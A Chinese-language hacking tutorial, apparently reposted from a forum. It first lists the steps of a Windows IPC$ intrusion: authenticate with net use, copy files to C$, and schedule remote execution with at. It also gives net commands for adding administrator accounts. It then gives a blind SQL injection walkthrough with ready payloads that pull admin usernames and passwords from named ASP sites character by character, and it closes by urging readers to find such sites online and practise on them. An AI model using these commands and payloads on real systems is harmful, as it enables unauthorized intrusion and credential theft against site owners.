信息来源:三少
ipc$经典入侵步骤:
1、net use \\ip\ipc$ 密码 /user:用户名
2、copy 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 时间 命令
5、入侵成功,连接你的肉鸡
常用的网络命令
*net user 查看用户列表
*net user 用户名 密码 /add 添加用户
*net user 用户名 密码 更改用户密码
*net localgroup administrators 用户名 /add 添加用户到管理组
*net user 用户名 /delete 删除用户
*net user 用户名 查看用户的基本情况
*net user 用户名 /active:no 禁用该用户
*net user 用户名 /active:yes 启用该用户
*net share 查看计算机IPC$共享资源
*net share 共享名 查看该共享的情况
*net share 共享名=路径 设置共享。例如 net share c$=c:
*net share 共享名 /delete 删除IPC$共享
*net stop lanmanserver 关闭ipc$和默认共享依赖的服务
*net use 查看IPC$连接情况
*net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
*net use \\ip\ipc$ /del 删除一个连接
*net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘
*net use z: /del
*net time \\ip 查看远程计算机上的时间
*copy 路径:\文件名 \\ip\共享名 复制文件到已经ipc$连接的计算机上
*net view ip 查看计算机上的共享资源
*at 查看自己计算机上的计划作业
*at \\ip 查看远程计算机上的计划作业
*at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
*at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
*at \\ip all /delete 删除远程计算机上的全部计划作业
*at \\ip time "echo 5 > c:\t.txt" 在远程计算机上建立文本文件t.txt;
Sql Injection攻击基础简化教程
Sql Injection入侵过程主要包括以下几个步骤:1、测试ASP系统是否有注入漏洞;2、获取数据库表名;3、测试管理员ID;4、测试管理员用户名长度和管理员密码长度;5、从高到低依次测试出管理员用户名和密码。
测试ASP系统是否有注入漏洞 这很关键,没有漏洞的网站你就别瞎忙了。方法也很简单,打开ASP网站一个分类网页,如盗帅下载系统中的/list.asp?id=11和逸风系统中的/class.asp?id=18等,在其后面分别加入and 1=1 和and 1=2进行测试,具体形式为
/list.asp?id=11 and 1=1 (以下各测试语句都用同样的形式加入,将不再说明)
注意空格。在IE浏览器里空格将自动转换为%20。如果输入and 1=1 能正常显示原页面内容,输入and 1=2不能正常显示原页面内容,就说明有SQL注入漏洞了,可以进行下面的步骤。
测试数据库表名 一个数据库里一般有很多表,我们要找到存放管理员用户名和密码的表。对于已知类型的ASP系统来说,可以到网上去下载一个压缩包,用辅臣数据库浏览器打开数据库查看就可以了,一般都是radmin。无论是否知道表名,都加以下语句测试一下:
and 0<>(select count(*) from admin)
如果能返回正常页面,说明表名就是admin,否则继续换表名测试。;
测试管理员ID 一般网站的管理员不是很多的,ID也不是很大,依次用1、2、3 ... ... 测试,很快就能测到,具体测试语句为:
and (select count(*) from admin where id=1)
变换最后的数字1进行测试,直到能正常返回原页面为止。
测试管理员用户名长度和管理员密码长度 这很重要,不知道用户名和密码是几位数下面的工作就无法进行。
用户名长度: and (select count(*) from admin where id=5 and len(username)=4)
密码长度: and (select count(*) from admin where id=5 and len(pws)=4)
需要注意的是,表里存放用户名的字段username和存放密码的字段pws需要打开数据库进行确认。
最后测试出管理员用户名和密码 从高到低,依次一位一位的测试,直到测出为止:
正在测试用户名的第三位字母 :and (select count(*) from admin where id=5 and left(username,3)='f2s')
正在测试第7位密码:and (select count(*) from admin where id=5 and left(pws,7)='536581')
好了,如果操作无误的话,你就可以测试出正确的用户名和密码了。马上到网上去找一个盗帅下载系统或逸风网站系统练习吧!对于新手来说,上面的方法可以看成是学习注入原理,实际操作起来是非常累人的,且不说语句是否正确、熟练掌握,单就马拉松式的测试用户名和密码就能累死你,每一位,如果是数字要测试10次,如果是字母要测试26次,如果哪位老兄用户名和密码都用上了!@#$%的话,那你慢慢去测试吧,呵呵!
